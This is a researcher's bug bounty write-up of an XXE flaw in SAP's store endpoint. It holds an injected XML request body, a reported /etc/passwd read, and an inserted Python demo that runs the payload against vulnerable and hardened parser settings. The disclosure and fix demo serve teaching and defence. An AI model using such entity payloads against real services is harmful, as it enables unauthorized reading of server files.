An interesting XXE in SAP.

Zain Sabahat
Nov 19, 2018 · 2 min read

Hello Folks!

Let me introduce myself to the community. I'm Zain Sabahat, a Security Researcher and Bug Bounty Hunter from Pakistan. Since I have learned a lot from reading write-ups, I have decided to do my part in giving back to the community. I will be disclosing some of my best findings in a series of write-ups.

Today I will be disclosing an XXE (XML External Entity) vulnerability I discovered in SAP's subdomain https://store.sap.com

During my recon, I came across the store subdomain. When I opened https://store.sap.com it redirected me to https://store.sap.com/sap/cpa/ui/resources/store/html/StoreFront.html. While that page loaded, a series of GET and POST requests were sent. One of the POST requests, to the /sap/cpa/api/getSolutions endpoint, caught my attention.

I changed the POST body to:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "Zain Here"> ]><SolutionListRequest><Facets><FacetType><Code/><Value/></FacetType></Facets><ListingType>2</ListingType><CountryCode>US</CountryCode><RetrieveAllDetailsIndicator>1</RetrieveAllDetailsIndicator><RetrieveFacetsIndicator/><RowCount>24&xxe;</RowCount><RowIndex>1</RowIndex><SearchText/><SolutionGroup/><SolutionTypeIndicator/><CategoryID/><RecommenderPageIndicator/><ResellerID/><ShoppingCartID/><CompanyID/><EndCustomerAddressID/><UserRoleCode/></SolutionListRequest>

in order to check whether it was vulnerable to XXE.

Verified the presence of XXE

When I saw my name printed in the response I was very happy and decided to take it further. I crafted a POST request to print out the contents of the /etc/passwd file.

Successfully printed out /etc/passwd file
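To show the mechanics of that payload in working code, here is an added example; it is not from the write-up and it is not SAP's code. The page does not identify the parser behind /sap/cpa/api/getSolutions, so Python's standard-library xml.sax (expat) parser stands in for it: the vulnerable configuration (external general entities enabled), the configuration that ignores them, and the one that rejects any DOCTYPE are run side by side against the same SolutionListRequest body, abbreviated to the elements that matter. The target is a temporary file holding constructed passwd-style lines, not the real /etc/passwd, so the example runs offline. The write-up's first probe used a non-URI string as the SYSTEM identifier and relied on the application reflecting something back; how a given parser reacts to that depends on its error handling, so this example goes straight to the file read that confirmed the impact. All function and class names are my own.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)

# Constructed stand-in for /etc/passwd; not real data.
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "sapadm:x:1001:1001::/home/sapadm:/bin/false\n")


def build_request(row_count: str, doctype: str = "") -> str:
    """SolutionListRequest body from the write-up, abbreviated to the
    elements that matter, with caller-controlled RowCount and DOCTYPE."""
    return (doctype
            + "<SolutionListRequest><ListingType>2</ListingType>"
            + "<CountryCode>US</CountryCode>"
            + "<RowCount>" + row_count + "</RowCount>"
            + "<RowIndex>1</RowIndex></SolutionListRequest>")


def xxe_payload(system_id: str) -> str:
    """The injection as reported: an external entity declared in the
    internal DTD subset and referenced inside <RowCount> next to the
    legitimate value, so whatever it resolves to rides along with it."""
    doctype = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "%s"> ]>' % system_id
    return build_request("24&xxe;", doctype)


class RowCountCollector(ContentHandler):
    """Mimics a backend that reads <RowCount>: all text the parser delivers
    for that element, expanded entities included, is collected here."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._parts = []

    def startElement(self, name, attrs):
        if name == "RowCount":
            self._inside = True

    def endElement(self, name):
        if name == "RowCount":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self._parts.append(content)

    @property
    def row_count(self) -> str:
        return "".join(self._parts)


class DoctypeForbidden(Exception):
    """Raised when a request carries a DOCTYPE; this API never needs one."""


class RejectDoctype:
    """Minimal SAX lexical handler that aborts on the first DOCTYPE."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeForbidden("DOCTYPE %r not allowed" % name)

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, content): pass


def parse_row_count(body: str, external_entities: bool,
                    reject_doctype: bool = False) -> str:
    """Parse a request under the given hardening choices; return RowCount."""
    parser = xml.sax.make_parser()
    # The vulnerable knob: xml.sax only fetches SYSTEM entities when this
    # feature is on (it has been off by default since Python 3.7.1).
    parser.setFeature(feature_external_ges, external_entities)
    if reject_doctype:
        parser.setProperty(property_lexical_handler, RejectDoctype())
    handler = RowCountCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body.encode("utf-8")))
    return handler.row_count


def demo() -> dict:
    """Run the same payload through the three parser configurations."""
    fd, path = tempfile.mkstemp(prefix="passwd-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(FAKE_PASSWD)
    try:
        body = xxe_payload(path)
        results = {
            # Vulnerable: the file contents are spliced into RowCount.
            "vulnerable": parse_row_count(body, external_entities=True),
            # Fix A: external entities off; the reference expands to nothing.
            "entities_off": parse_row_count(body, external_entities=False),
        }
        # Fix B: refuse any DOCTYPE, so no entity can be declared at all.
        try:
            parse_row_count(body, external_entities=False, reject_doctype=True)
            results["doctype_rejected"] = False
        except DoctypeForbidden:
            results["doctype_rejected"] = True
        return results
    finally:
        os.remove(path)


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", repr(value))
```

Fix A is what most parsers' "disable external entities" switch does, and it is enough to stop the file read shown here; Fix B is the stricter and simpler rule for an API whose requests never legitimately carry a DOCTYPE, because it also removes the parameter-entity and entity-expansion tricks that a plain external-entity switch leaves open.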

Timeline:

Jun 26, 2017 — Reported to SAP.

Jul 17, 2017 — Triaged.

Feb 13, 2018 — Fixed.

April 10, 2018 — Added to Hall Of Fame.

It took almost a year to fix because the bug was in an internal component that was hard to replace.

Thanks for reading! Stay tuned for more write-ups!
